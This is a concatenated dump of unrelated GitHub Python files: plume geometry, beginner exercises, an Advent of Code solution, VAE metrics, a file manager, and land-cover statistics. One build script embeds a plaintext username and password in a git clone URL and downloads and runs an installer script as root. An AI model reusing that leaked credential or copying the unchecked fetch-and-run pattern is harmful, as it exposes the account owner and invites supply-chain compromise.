enclosed by vertices, assuming\r\n a flat plane.\r\n \r\n Raises:\r\n ValueError if the vertices are not shape (4, 2)\r\n \"\"\"\r\n if not numpy.shape(vertices)==(4,2):\r\n raise ValueError(\"vertices must be shape (4,2). Given\\n{0}\".format(vertices))\r\n \r\n latitudes = vertices[:,1]\r\n longitudes = vertices[:,0]\r\n \r\n def reproject(latitude, longitude):\r\n \"\"\"Returns the x & y coordinates in meters using a sinusoidal projection\"\"\"\r\n from math import pi, cos, radians\r\n lat_dist = pi * _earth_radius / 180.0\r\n\r\n y = [lat * lat_dist for lat in latitude]\r\n x = [long * lat_dist * cos(radians(lat)) \r\n for lat, long in zip(latitude, longitude)]\r\n return x, y\r\n \r\n ring = ogr.Geometry(ogr.wkbLinearRing)\r\n \r\n x_r, y_r = reproject(latitudes,longitudes)\r\n for (x,y) in zip(x_r,y_r):\r\n ring.AddPoint(x,y)\r\n ring.AddPoint(x_r[0],y_r[0]) # close the ring\r\n \r\n poly = ogr.Geometry(ogr.wkbPolygon)\r\n poly.AddGeometry(ring)\r\n area = poly.GetArea()\r\n \r\n return area\r\n\r\n \r\n \r\n\r\ndef cosdeg(x):\r\n \"\"\"Converts x to radians from degrees and returns cos(x_radians)\"\"\"\r\n angle = x * pi/180.\r\n return cos(angle)\r\n \r\n \r\n\r\nclass SZA(object):\r\n \"\"\"Controls zenith and azimuth angle adjustments.\r\n \r\n Recommended to look at the diagrams, equations in the math\r\n documentation before reading this class.\r\n \r\n Finds the model enhancements at the \"incoming\" and \"reflected\"\r\n points in the plume, and averages the model enhancements at\r\n these two points.\r\n \r\n Attributes:\r\n data: The object containing OCO-2 data\r\n wind: Wind instance to use as direction basis\r\n coord: CoordGeom instance used to compute distance offsets\r\n \"\"\"\r\n def __init__(self,data,wind):\r\n \"\"\"Initializes SZA instance.\r\n \r\n Args:\r\n data, a File.File instance to get datasets from\r\n wind, a PST.Wind instance to create a CoordGeom instance\r\n for computing distances, etc.\r\n \"\"\"\r\n self.data = data\r\n self.wind = wind\r\n coord = CoordGeom(wind)\r\n self.coord = coord\r\n \r\n def offsets(self,i):\r\n \"\"\"Calculates the (x,y) offsets for incoming and reflected ray.\r\n \r\n The (x, y) offsets must be used to shift the model enhancemnts to\r\n account for the discrepancy between the footprint on the ground,\r\n and where the rays actually pass through the plume.\r\n \r\n Args:\r\n i, the index in the data to calcualte the offset for\r\n \r\n Returns:\r\n List of tuples [(xi, yi), (xr, yr)] for incoming and reflected\r\n ray offsets. Offsets themselves are calculated using\r\n CoordGeom.sza_offset method\r\n \"\"\"\r\n data = self.data\r\n incoming_coords = self.coord.sza_offset(data.retrieval_solar_zenith[i], data.retrieval_solar_azimuth[i])\r\n reflected_coords= self.coord.sza_offset(data.retrieval_zenith[i], data.retrieval_solar_azimuth[i])\r\n return (incoming_coords, (-reflected_coords[0], -reflected_coords[1]))\r\n \r\n def V(self,x,y,u,F,a,i,correction=False):\r\n \"\"\"Computes the model enhancements including SZA offsets.\r\n \r\n Incoming and reflected offsets are calculated with offsets\r\n method. These offsets are applied to the position (x, y), and\r\n then enhancements are calculated using PlumeModel.V function.\r\n \r\n Args:\r\n Args passed to PlumeModel.V (x, y, u, F, a)\r\n i; index in file to use for zenith and azimuth angles\r\n correction; A Bool controlling whether to account for\r\n the angle the ray passes through the plume in.\r\n No longer implemented, since we are using a\r\n 2D plume model and this opens up too many\r\n other uncertainties.\r\n \r\n Returns:\r\n Enhancements in g/m^2 that are expected at ground footprint (x,y)\r\n \"\"\"\r\n (x_incoming, y_incoming), (x_reflected, y_reflected) = self.offsets(i)\r\n V_incoming = PlumeModel.V(x+x_incoming, y+y_incoming, u,F,a)\r\n V_reflected = PlumeModel.V(x+x_reflected, y+y_reflected, u,F,a)\r\n V_corrected = 0.5*(V_incoming + V_reflected)\r\n \r\n return V_corrected\r\n \r\n def __repr__(self):\r\n return \"SZA({0},{1}\".format(self.data, self.wind.__repr__())\r\n \r\n def __str__(self):\r\n return \"SZA({0})\".format(self.data)\r\n \r\n \r\n## Following class is able to calcualte model enhancements by\r\n## integrating along paths from the ground to the 3D point (x,y,z)\r\n## to calculate more accurately the expected enhancements. This was\r\n## tested and would work properly if we used a full 3D Gaussian plume\r\n## model. This was never actually implemented in the production Model.\r\n# class Line:\r\n # \"\"\"class for parameterizing a line between two (x, y, z) coordinates.\r\n # Uses the position (x_source, y_source, 0) as the source, and calculates\r\n # the parameterization of the line.\r\n \r\n # Conveniently, you can iterate over a Line instance and it will yield\r\n # (x, y, z) for each point on the line.\r\n \r\n # Calculates the path integral along the line for a specified scalar field,\r\n # or along a vertical path with x, y fixed.\r\n \r\n # This lets you calculate the additional factor due to increased path length\r\n # through the CO2 plume\r\n \r\n # The first point must be the ground footprint point, unless you specify\r\n # explicitly in the vertical_line_integral method\"\"\"\r\n \r\n # def __init__(self,p1=None, p2=None):\r\n # self.points = []\r\n # if p1:\r\n # self.points.append(p1)\r\n \r\n # if p2:\r\n # self.points.append(p2)\r\n \r\n # def add_point(self, pnt):\r\n # if len(self.points)==2:\r\n # err_msg = \"This line is already associated with points {0}, {1};\\\r\n # can not add point {2}\".format(self.points[0],self.points[1],pnt)\r\n # raise ValueError(err_msg)\r\n # self.points.append(pnt)\r\n \r\n # def remove_point(self,index=-1):\r\n # self.points.pop(index)\r\n \r\n # def discrete(self,npoints=101):\r\n # \"\"\"Returns a list of [x_points, y_points, z_points] where each is an\r\n # array of points in that dimension on the line\"\"\"\r\n # if len(self.points)!=2:\r\n # raise ValueError(\"Line must have two points to parameterize\")\r\n \r\n # try:\r\n # (x1, y1, z1), (x2, y2, z2) = self.points\r\n # except:\r\n # raise\r\n # else:\r\n # x_pts = numpy.linspace(x1,x2,npoints)\r\n # y_pts = numpy.linspace(y1,y2,npoints)\r\n # z_pts = numpy.linspace(z1,z2,npoints)\r\n # return [x_pts, y_pts, z_pts]\r\n \r\n # def __iter__(self,npoints=101):\r\n # \"\"\"Allows iteration over discrete points on the line.\r\n \r\n # Yields:\r\n # (x, y, z) for each point on the line, calculated at\r\n # npoints number of discrete points\"\"\"\r\n # x_pts, y_pts, z_pts = self.discrete(npoints)\r\n # for (x,y,z) in zip(x_pts, y_pts, z_pts):\r\n # yield (x,y,z)\r\n \r\n # def __repr__(self):\r\n # pts = ', '.join([str(p) for p in self.points])\r\n # return \"Line({0})\".format(pts)\r\n \r\n # def parameterize(self):\r\n # \"\"\"Function representing the parameterization of the line.\r\n \r\n # Returns:\r\n # A function object \r\n # L(t) = (a*t + x0, b*t + y0, c*t + z0)\r\n \r\n # Function returns the vector (x(t), y(t), z(t)\"\"\"\r\n # (x1, y1, z1), (x2, y2, z2) = self.points\r\n # a, b, c = self.coefficients()\r\n # def line(t):\r\n # return (a*t+x1, b*t+y1, c*t+z1)\r\n # return line\r\n \r\n \r\n # def coefficients(self):\r\n # \"\"\"Calculates the coefficients (really this is the derivative) of\r\n # the line.\r\n \r\n # Returns:\r\n # Let the line be parameterized by\r\n # L = (a*t + x0, b*t + y0, c*t + z0)\r\n # self.coefficients() returns (a, b, c)\"\"\"\r\n # (x1, y1, z1), (x2, y2, z2) = self.points\r\n # vector = (x2-x1, y2-y1, z2-z1)\r\n # norm = numpy.linalg.norm(vector)\r\n # return numpy.array(vector)/norm\r\n \r\n \r\n # def integrate(self, function, t_lower=-numpy.inf, t_upper=numpy.inf):\r\n # \"\"\"Calls scipy.integrate after setting up a path integral.\r\n \r\n # Args:\r\n # function is a scalar field F(x,y,z)\r\n \r\n # Returns:\r\n # scalar path integral along path described by self, through scalar\r\n # field F, from t_lower to t_upper\r\n # \"\"\"\r\n # a,b,c = self.coefficients()\r\n # (x1,y1,z1) = self.points[0]\r\n # dt = (a*a + b*b + c*c)**0.5\r\n \r\n # def integrand(t):\r\n # return function(a*t+x1, b*t+y1, c*t+z1)*dt\r\n \r\n # return scipy.integrate.quad(integrand, t_lower, t_upper)[0]\r\n \r\n # def vertical_line_integral(self, function, point=0, \r\n # t_lower=-numpy.inf, t_upper=numpy.inf):\r\n # \"\"\"Calls scipy.integrate after setting up a path integral.\r\n # Integrates vertically from point at index point\r\n \r\n # Args:\r\n # function is a scalar field F(x,y,z)\r\n \r\n # Returns:\r\n # scalar path integral along path described by self, through scalar\r\n # field F, from t_lower to t_upper\r\n # \"\"\"\r\n \r\n # (x1,y1,z1) = self.points[point]\r\n \r\n # def vertical_function(t):\r\n # \"\"\" No dt since the norm of the derivative is 1, as we\r\n # defined the coefficient of z to be 1\"\"\"\r\n # return function(x1,y1,t+z1)\r\n\r\n # vertical_path = scipy.integrate.quad(vertical_function, t_lower, t_upper)[0]\r\n # return vertical_path\r\n \r\n # def airmass_factor(self,function):\r\n # return float(self.integrate(function))/float(self.vertical_line_integral(function))\r\n","repo_name":"tghill-private/ideal-octopy","sub_path":"python/PointSources/Geometry.py","file_name":"Geometry.py","file_ext":"py","file_size_in_byte":21065,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"29871756652","text":"#Daniil Meijel\r\n#11.10.22\r\n#Ülesanne02\r\nimport math\r\n\r\n\r\n\r\nkm = 400\r\nl = 26\r\nv = l/(km*100)\r\nprint(v)\r\n\r\n\r\n\r\n\r\n#arvusüsteemid\r\nb = int(input(\"sisesta täisarv: \"))\r\nprint(\"2ndsüsteemis:\", bin(b))\r\nprint(\"16ndsüsteemis:\", hex(b))\r\n\r\n\r\n\r\n#ajateisendus\r\naeg = int(input(\"Sisesta minutid: \"))\r\ntunnid = aeg // 60 #täisarvuline jagamine\r\nminutid = aeg % 60 #jääk\r\nprint(\"Vastus:\",minutid,\":\",tunnid)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#hüpotenuus\r\na,b = 16,9\r\nc = round(math.sqrt(pow(a,2) + b**2),2)\r\nprint(\"Kolmnurga hüpo on:\",c)\r\n\r\n\r\n\r\n\r\n#rulluisutajad\r\nkiirus = 29.9\r\naeg = 24\r\nkaugus = round(kiirus/60*aeg,2)\r\nprint(\"Sportlane jõuab\",kaugus,\"km\")\r\n\r\n\r\n\r\n\r\n\r\n#pitsa\r\nhind = 12.9\r\ntip = 0.1\r\nkogus = 3\r\nsumma = (hind+hind*tip)/kogus\r\nprint(kogus,\"Iga tüüp maksab\",summa,\"eurot\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#toote hind\r\nhind = 36.75\r\nale = 0.4\r\nkogus = 3\r\nsumma = round((hind-hind*ale)*3,2)\r\nprint(kogus,\"toote summa on\",summa,\"eurot\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#kolmnurga ümbermõõt\r\na,b,c = 5,5,5\r\np = a + b + c\r\nprint(\"Kolmnurga ümbermõõt on: \", p)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"AeroDynamicc/Pythonn","sub_path":"h02d.py","file_name":"h02d.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"et","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31691170432","text":"from collections import Counter\n\n\ndef simulate(f, iterations):\n forest = []\n seen = {}\n period = []\n printed = False\n\n for line in f.readlines():\n forest.append(line.strip())\n\n for i in range(0, iterations):\n if i % 100 == 0:\n print(i)\n\n new = []\n\n for y, row in enumerate(forest):\n line = ''\n\n for x, c in enumerate(row):\n counts = count_close(forest, y, x)\n\n if c == '.':\n if counts['trees'] > 2:\n line += '|'\n else:\n line += '.'\n\n if c == '|':\n if counts['lumberyards'] > 2:\n line += '#'\n else:\n line += '|'\n\n if c == '#':\n if counts['lumberyards'] and counts['trees']:\n line += '#'\n else:\n line += '.'\n\n new.append(line)\n\n checksum = '-'.join(new)\n\n if checksum in seen and not printed:\n printed = True\n state = (iterations - seen[checksum]) % (i - seen[checksum])\n idx = seen[checksum] + state\n\n # 208750 -- too high\n # 194959 -- too low\n print(state)\n print('period', i, 'from', seen[checksum])\n print('idx', )\n c = Counter(period[idx - 1])\n return c['#'] * c['|']\n\n seen[checksum] = i\n period.append(checksum)\n forest = new\n\n c = Counter()\n\n for row in forest:\n c.update(row)\n\n return c['#'] * c['|']\n\n\ndef count_close(forest, y, x):\n counts = {\n 'trees': 0,\n 'lumberyards': 0,\n }\n\n if y > 0 and x > 0:\n add_count(counts, forest[y-1][x-1])\n\n if y > 0:\n add_count(counts, forest[y-1][x])\n\n if x > 0:\n add_count(counts, forest[y][x-1])\n\n if y < (len(forest) - 1):\n add_count(counts, forest[y + 1][x])\n\n if x < (len(forest[y]) - 1):\n add_count(counts, forest[y][x + 1])\n\n if y < (len(forest) - 1) and x < (len(forest[y]) - 1):\n add_count(counts, forest[y + 1][x + 1])\n\n if y < (len(forest) - 1) and x > 0:\n add_count(counts, forest[y + 1][x - 1])\n\n if x < (len(forest[y]) - 1) and y > 0:\n add_count(counts, forest[y - 1][x + 1])\n\n return counts\n\n\ndef add_count(counts, letter):\n if letter == '|':\n counts['trees'] += 1\n elif letter == '#':\n counts['lumberyards'] += 1\n\n\ndef test_simulate():\n assert simulate(open('input/18.test'), iterations=10) == 1147\n\n\nif __name__ == '__main__':\n print(simulate(open('input/18'), iterations=1_000_000_000))","repo_name":"matslindh/codingchallenges","sub_path":"adventofcode2018/18.py","file_name":"18.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"73844127128","text":"#!/usr/bin/python3\nimport os\nimport sys\n\ntinc_lib_dir = \"/root/tinc/lib\"\ntry:\n os.system(\"mkdir -p \" + tinc_lib_dir)\nexcept:\n pass\n\nif len(sys.argv) > 1 and sys.argv[1] == \"init\":\n os.system(\"cp /usr/lib/x86_64-linux-gnu/liblzo2.so \" + tinc_lib_dir + \"/liblzo2.so.2\")\n os.system(\"cp /lib/x86_64-linux-gnu/libncurses.so.5.9 \" + tinc_lib_dir + \"/libncurses.so.5\")\n\n openssl_dir = \"/root/openssl\"\n\n print(\"download openssl\")\n\n os.system(\"wget https://github.com/openssl/openssl/archive/OpenSSL_1_1_1.tar.gz\")\n os.system(\"tar zxvf OpenSSL_1_1_1.tar.gz\")\n os.system(\"mv openssl-OpenSSL_1_1_1 \" + openssl_dir)\n print(\"download openssl finish.\")\n\n os.chdir(openssl_dir)\n os.system(\"chmod 777 config\")\n os.system(\"./config shared\")\n os.system(\"make install\")\n os.system(\"cp /root/openssl/libcrypto.so.1.1 \" + tinc_lib_dir + \"/libcrypto.so.1.1\")\n\n readline_dir = \"/root/readline-8.0\"\n os.chdir(\"/root\")\n os.system(\"wget http://ftp.gnu.org/gnu/readline/readline-8.0.tar.gz\")\n os.system(\"tar -zxvf readline-8.0.tar.gz\")\n os.chdir(readline_dir)\n os.system(\"chmod 777 configure\")\n os.system(\"./configure --enable-shared\")\n os.system(\"make\")\n os.system(\"sudo make install\")\n os.system(\"cp /usr/lib/x86_64-linux-gnu/libreadline.so \" + tinc_lib_dir + \"/libreadline.so.8\")\n\n cargo_dir = \"/root/.cargo\"\n os.chdir(\"/root\")\n while True:\n try:\n os.system(\"wget -O rustup.sh https://sh.rustup.rs\")\n os.system(\"chmod 0755 rustup.sh\")\n os.system(\"./rustup.sh -y\")\n break\n except:\n pass\n\nif len(sys.argv) > 1 and (sys.argv[1] == \"tinc\" or sys.argv[1] == \"init\"):\n tinc_dir = \"/root/tinc_src\"\n if not os.path.exists(tinc_dir):\n os.chdir(\"/root\")\n os.system(\"git clone -b release-1.1pre17 https://github.com/gsliepen/tinc.git \"\n + tinc_dir)\n os.chdir(tinc_dir)\n else:\n os.chdir(tinc_dir)\n\n os.chdir(tinc_dir)\n os.system(\"autoreconf -fsi\")\n os.system(\"chmod 777 configure\")\n os.system(\"./configure\"\n \" --with-readline-lib=/root/readline-8.0/shlib/\"\n \" --with-readline-include=/root/readline-8.0/include\")\n os.system(\"sed -i 's#FLAGS = -g -O2 -Wall#FLAGS = -g -O2 -Wall -Wl,-rpath=/opt/dnet/tinc/lib#g' \"\n + tinc_dir + \"/src/Makefile\")\n os.system(\"make\")\n if os.system(\"cp \" + tinc_dir + \"/src/tinc /root/tinc/tinc\"):\n print(\"compile tinc failed.\")\n exit(1)\n if os.system(\"cp \" + tinc_dir + \"/src/tincd /root/tinc/tincd\"):\n print(\"compile tincd failed.\")\n exit(1)\n\n\nif len(sys.argv) == 1 \\\n or (len(sys.argv) > 1\n and (sys.argv[1] == \"dnet\" or sys.argv[1] == \"init\")):\n dnet_dir = \"/root/dnetnode\"\n if not os.path.exists(dnet_dir):\n os.system(\"git clone -b origin_tinc http://bowen.yan:siteview123%21%40%23@git.vlan.cn/dnet/dnetnode \"\n + dnet_dir)\n os.chdir(dnet_dir)\n else:\n os.chdir(dnet_dir)\n os.system(\"git pull --rebase\")\n\n path = os.getenv(\"PATH\")\n path += \":$HOME/.cargo/bin\"\n os.putenv(\"PATH\", path)\n os.putenv(\"OPENSSL_DIR\", \"/usr/local\")\n os.putenv(\"OPENSSL_STATIC\", \"1\")\n os.chdir(dnet_dir)\n os.system(\"/root/.cargo/bin/rustup update\")\n os.system(\"/root/.cargo/bin/cargo build --release\")\n\nos.chdir(\"/root\")\nbuild_dir = \"/root/dnet\"\nos.system(\"mkdir -p /root/dnet/DEBIAN /root/dnet/lib/systemd/system \"\n \"/root/dnet/opt/dnet /root/dnet/opt/dnet/tinc/lib \"\n \"/root/dnet/opt/dnet/tinc\")\nos.system(\"cp /root/dnetnode/cert.pem ./dnet/opt/dnet\")\nos.system(\"cp /root/dnetnode/key.pem ./dnet/opt/dnet\")\nos.system(\"cp /root/dnetnode/settings.example.toml ./dnet/opt/dnet/settings.example.toml\")\nos.system(\"cp /root/dnetnode/target/release/dnet-daemon ./dnet/opt/dnet\")\nos.system(\"cp /root/dnetnode/target/release/dnet ./dnet/opt/dnet\")\nos.system(\"cp /root/dnetnode/target/release/tinc-report ./dnet/opt/dnet/tinc\")\nos.system(\"cp /root/dnetnode/compile_script/control ./dnet/DEBIAN\")\nos.system(\"cp /root/dnetnode/compile_script/dnet.service ./dnet/lib/systemd/system/dnet.service\")\nos.system(\"cp /root/tinc/* /root/dnet/opt/dnet/tinc -rf\")\nos.system(\"dpkg-deb -b /root/dnet dnet.deb\")\nos.system(\"cp /root/dnet.deb /mnt/\")\nprint(\"finish\")\n","repo_name":"yanbowen1994/dnetnode","sub_path":"compile_script/vagrant/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":4323,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"6850774227","text":"import tensorflow_datasets as tfds\nimport numpy as np\n\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\n\nfrom mig_compute import estimate_entropies\n\ndef get_dsprites_tf_dataset():\n # data have been shuffled by tensorflow\n # data will be batched before training\n return tfds.load('Dsprites', split='train', batch_size=256)\n\nclass OrderedDsprites:\n def __init__(self, data_file='dsprites_ordered.npz'):\n # load dataset\n dataset = np.load(data_file, allow_pickle=True, encoding=\"latin1\")\n self.imgs = dataset[\"imgs\"][:]\n self.latent_sizes = dataset[\"metadata\"][()][\"latents_sizes\"][:]\n # get rid of color dimension here\n self.latent_sizes = self.latent_sizes[1:]\n self.latent_bases = np.concatenate((\n self.latent_sizes[::-1].cumprod()[::-1][1:], np.array([1,]),))\n\n def sample_latent(self, nsamples=1):\n samples = np.zeros((nsamples, self.latent_sizes.size), dtype=int)\n for lat_i, lat_size in enumerate(self.latent_sizes):\n samples[:, lat_i] = np.random.randint(lat_size, size=nsamples)\n return samples\n\n def get_images_from_latent(self, latent_samples):\n # latent to indices\n indices = np.dot(latent_samples, self.latent_bases).astype(int)\n return self.imgs[indices]\n \n def compute_zdiff_y(self, vae, n_zdiff_per_y, n_img_per_zdiff):\n # create arrays\n y_size = self.latent_sizes.size\n z_diff_all = np.zeros((y_size, n_zdiff_per_y, vae.latent_dim), dtype=np.float32)\n y_all = np.zeros((y_size, n_zdiff_per_y), dtype=int)\n \n for y in range(y_size):\n # sample\n v1 = self.sample_latent(n_zdiff_per_y * n_img_per_zdiff)\n v2 = self.sample_latent(n_zdiff_per_y * n_img_per_zdiff)\n # keey y the same\n v1[:, y] = v2[:, y]\n # get images\n x1 = self.get_images_from_latent(v1)\n x2 = self.get_images_from_latent(v2)\n # encode \n z1 = vae.encoder.predict(x1)[0]\n z2 = vae.encoder.predict(x2)[0]\n # z_diff\n z_diff = np.abs(z1 - z2)\n # separate dimensions: n_zdiff_per_y, n_img_per_zdiff\n z_diff = z_diff.reshape((n_zdiff_per_y, n_img_per_zdiff, vae.latent_dim))\n # take average over n_img_per_zdiff\n z_diff_all[y, :, :] = np.mean(z_diff, axis=1)\n # y\n y_all[y, :] = y\n \n # merge dimensions: y_size, n_zdiff_per_y\n z_diff_all = z_diff_all.reshape((y_size * n_zdiff_per_y, vae.latent_dim))\n y_all = y_all.reshape((y_size * n_zdiff_per_y))\n \n # shuffle z_diff and y consistently\n shuffle_indices = np.arange(0, y_size * n_zdiff_per_y)\n np.random.shuffle(shuffle_indices)\n z_diff_all = z_diff_all[shuffle_indices]\n y_all = y_all[shuffle_indices]\n return z_diff_all, y_all\n \n def compute_disentangle_metric_score(self, vae, n_zdiff_per_y=5000, \n n_img_per_zdiff=64, random_seed=0):\n # seed\n np.random.seed(random_seed)\n # prep training and test data\n zdiff, y = self.compute_zdiff_y(vae, n_zdiff_per_y, n_img_per_zdiff)\n # sklearn linear classifier\n classifier = make_pipeline(\n StandardScaler(), \n SGDClassifier(loss=\"log\", early_stopping=True, random_state=random_seed)\n )\n # train\n classifier.fit(zdiff, y)\n # score with test data\n return classifier.score(zdiff, y)\n \n def compute_MIG(self, vae, n_samples):\n N = len(self.imgs)\n K = vae.latent_dim\n\n # encode all images\n qz_mean = np.zeros((N, K), dtype=np.float32)\n qz_log_var = np.zeros((N, K), dtype=np.float32)\n qz_sample = np.zeros((N, K), dtype=np.float32)\n batch_size = 256\n for ibatch, start in enumerate(range(0, N, batch_size)):\n end = min(start + batch_size, N)\n z_mean, z_log_var, z_sample = vae.encoder.predict(self.imgs[start:end])\n qz_mean[start:end] = z_mean\n qz_log_var[start:end] = z_log_var\n qz_sample[start:end] = z_sample\n \n # marginal entropies\n marginal_entropies = estimate_entropies(\n qz_mean, qz_log_var, qz_sample, n_samples)\n \n # conditional entropies\n cond_entropies = np.zeros((4, K), dtype=np.float32)\n \n # index slices for the entire structured data\n slices = []\n for sz in self.latent_sizes:\n slices.append(slice(sz))\n slices.append(slice(K))\n \n # reshape data to structured\n reshape_id = list(self.latent_sizes) + [K,]\n qz_mean = qz_mean.reshape(reshape_id)\n qz_log_var = qz_log_var.reshape(reshape_id)\n qz_sample = qz_sample.reshape(reshape_id)\n \n # iter over (scale, rotation, pos_x, pos_y)\n for index_y in range(1, len(self.latent_sizes)):\n slices_copy = slices.copy()\n n_y = self.latent_sizes[index_y]\n # iter over y\n for i_y in range(n_y):\n slices_copy[index_y] = i_y\n qz_mean_sub = qz_mean[tuple(slices_copy)].copy().reshape((N // n_y, K))\n qz_log_var_sub = qz_log_var[tuple(slices_copy)].copy().reshape((N // n_y, K))\n qz_sample_sub = qz_sample[tuple(slices_copy)].copy().reshape((N // n_y, K))\n cond_ent = estimate_entropies(\n qz_mean_sub, qz_log_var_sub, qz_sample_sub, n_samples)\n cond_entropies[index_y - 1, :] += cond_ent / n_y\n \n # compute MIG\n factor_entropies = self.latent_sizes[1:]\n mutual_infos = marginal_entropies[None] - cond_entropies\n mutual_infos = np.clip(np.sort(mutual_infos, axis=1)[:, ::-1], a_min=0, a_max=None)\n mi_normed = mutual_infos / np.log(factor_entropies)[:, None]\n mig = np.mean(mi_normed[:, 0] - mi_normed[:, 1])\n return mig\n \n","repo_name":"jamesacris/constrained-vae","sub_path":"dSprites_beta_VAE/dsprites_data.py","file_name":"dsprites_data.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9415850716","text":"import os\r\nimport shutil\r\n\r\nfrom Log.log_decorator import log\r\nfrom Log.logger import logger\r\n\r\n\r\n@log\r\ndef create_file(name, text=None):\r\n with open(name, 'w', encoding='utf-8') as f:\r\n if text:\r\n f.write(text)\r\n\r\n\r\n@log\r\ndef create_folder(name):\r\n try:\r\n os.mkdir(name)\r\n except FileExistsError:\r\n logger.critical(f'Директория {name} уже существует')\r\n\r\n\r\n@log\r\ndef get_list(folders_only=False):\r\n result = os.listdir()\r\n if folders_only:\r\n result = [f for f in result if os.path.isdir(f)]\r\n print(result)\r\n\r\n\r\n@log\r\ndef delete_file(name):\r\n if os.path.isdir(name):\r\n os.rmdir(name)\r\n else:\r\n os.remove(name)\r\n\r\n\r\n@log\r\ndef change_dir(name):\r\n os.chdir(name)\r\n logger.info(f'Смена рабочей директории на {os.getcwd()}')\r\n print(os.getcwd())\r\n\r\n\r\n@log\r\ndef copy_file(name, new_name):\r\n if os.path.isdir(name):\r\n shutil.copytree(name, new_name)\r\n else:\r\n shutil.copy(name, new_name)\r\n\r\n\r\ndef print_help():\r\n \"\"\"\r\n Commands in help\r\n :return:\r\n \"\"\"\r\n print('Поддерживаемые команды:')\r\n print('list - список файлов и директорий')\r\n print('list_True - список директорий')\r\n print('create_file - создание файла')\r\n print('create_folder - создание директории')\r\n print('delete - удаление файла или директории')\r\n print('copy - копирование файла или директории')\r\n print('help - вывести подсказки по командам')\r\n print('exit - выход из программы')\r\n\r\n\r\n# Отладка\r\n\r\nif __name__ == '__main__':\r\n create_file('test.dat')\r\n create_file('test.dat', 'test text')\r\n create_folder('test_folder 1')\r\n get_list()\r\n get_list(True)\r\n delete_file('test.dat')\r\n delete_file('test_folder 1')\r\n copy_file('test.dat', 'new_test.dat')\r\n copy_file('test_folder 1', 'new_test_folder 1')\r\n","repo_name":"nikolaeff80/Console_File_Manager","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42604868882","text":"\n###############################################################################\n# NOTICE THIS CODE ONLY REFERS TO MLP3X3, IT IS POSSIBLE TO MODIFY IT #\n# FOR OTHER CLASSIFIERS BY JUST CHANGING path. ANYWAY, IT IS IMPORTANT #\n# TO CHECK LABELS SECTION WHEN PLOTTING AS THEY ARE CLASSIFIER SPECIFIC #\n###############################################################################\n\n\nimport os \nimport numpy as np\nimport rasterio\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom scipy.special import rel_entr\n\n#%%\n\nlucas_stat_path = 'C:/Users/drikb/Desktop/Tirocinio/GRAPH NEURAL NETWORKS/Random forest project/Dati/LUCAS/Lucas statistics/'\n\nlucas_stat = pd.read_csv(lucas_stat_path + 'lan_lcv_ovw_1_Data.csv', encoding='latin-1')\n\n#%%\n\npath = 'C:/Users/drikb/Desktop/Land Cover Classifier/Predictions/RF3x3/'\n\nall_percentages = []\nfor trial in os.listdir(path):\n pred_path = path + trial + '/'\n percentages = []\n for img in os.listdir(pred_path):\n if img.endswith('.tif'):\n image = rasterio.open(pred_path + img)\n predictions = image.read(1)\n tot = len(np.where(predictions != 0)[0])\n image_percentages = []\n for category in np.unique(predictions)[1:]:\n num = len(np.where(predictions == category)[0])\n image_percentages.append(num/tot)\n percentages.append(image_percentages)\n all_percentages.append(percentages)\n \n#%%\n\nperc_array = np.array(all_percentages)\n\nperc_array = np.mean(perc_array, axis = 1)\n\nperc_mean = np.mean(perc_array, axis = 0)\nperc_std = np.std(perc_array, axis = 0)\n \n\ndescription = np.array(['Artificial land',\n 'Cropland',\n 'Woodland',\n 'Shrubland',\n 'Grassland',\n 'Bareland',\n 'Water',\n 'Wetlands'])\n\noverall_percentages = pd.DataFrame(np.array([description, perc_mean, perc_std]).T, columns = ['Land Cover', 'Value', 'std']) \n\n\n#%%\n\nlazio_lucas_percentages = lucas_stat[lucas_stat['GEO'] == 'Lazio'][lucas_stat['UNIT'] == 'Percentage'][lucas_stat['TIME'] == 2018]\n\n#%%\n\ncomparison_df = pd.DataFrame(np.array([overall_percentages['Land Cover'].values, \n overall_percentages['Value'].values.astype('float32'), \n overall_percentages['std'].values.astype('float32'),\n lazio_lucas_percentages['Value'].values.astype('float32')/100]).T,\n columns = ['Land Cover', 'Predictions', 'std', 'Truth'])\n\n\ncomparison_df['Difference'] = comparison_df['Truth'] - comparison_df['Predictions']\ncomparison_df['Relative Difference'] = (comparison_df['Truth'] - comparison_df['Predictions'])/comparison_df['Truth']\n\n#%%\n\n\nresh_comp = pd.concat([comparison_df.loc[:,('Land Cover', 'Predictions', 'std')].rename(columns = {'Predictions' : 'Value'}), \n comparison_df.loc[:,('Land Cover', 'Truth')].rename(columns = {'Truth' : 'Value'})], \n axis = 0,\n keys = ['Predictions', 'Truth'],\n names = ['Category', 'ID']).reset_index()\n\nresh_comp['CV'] = resh_comp['std']/resh_comp['Value']\n\n\n\nresh_comp.replace(resh_comp['std'][resh_comp['std'].isna()], 0)\n\n#%%\n\n###############################################################################\n# DISTRIBUTION EVALUATION #\n\ndifferences_frame = pd.DataFrame(perc_array.T)\ndifferences_frame = pd.concat([differences_frame, comparison_df[['Truth', 'Land Cover']]], axis = 1)\n\n\n# MEAN DIFFERENCE # # # # # # \neach_difference = np.array([differences_frame['Truth'] - differences_frame.iloc[:,i] for i in range(10)], dtype = 'float32').T\n\nmean_each_diff = np.mean(abs(each_difference), axis = 1)\n\nstd_each_diff = 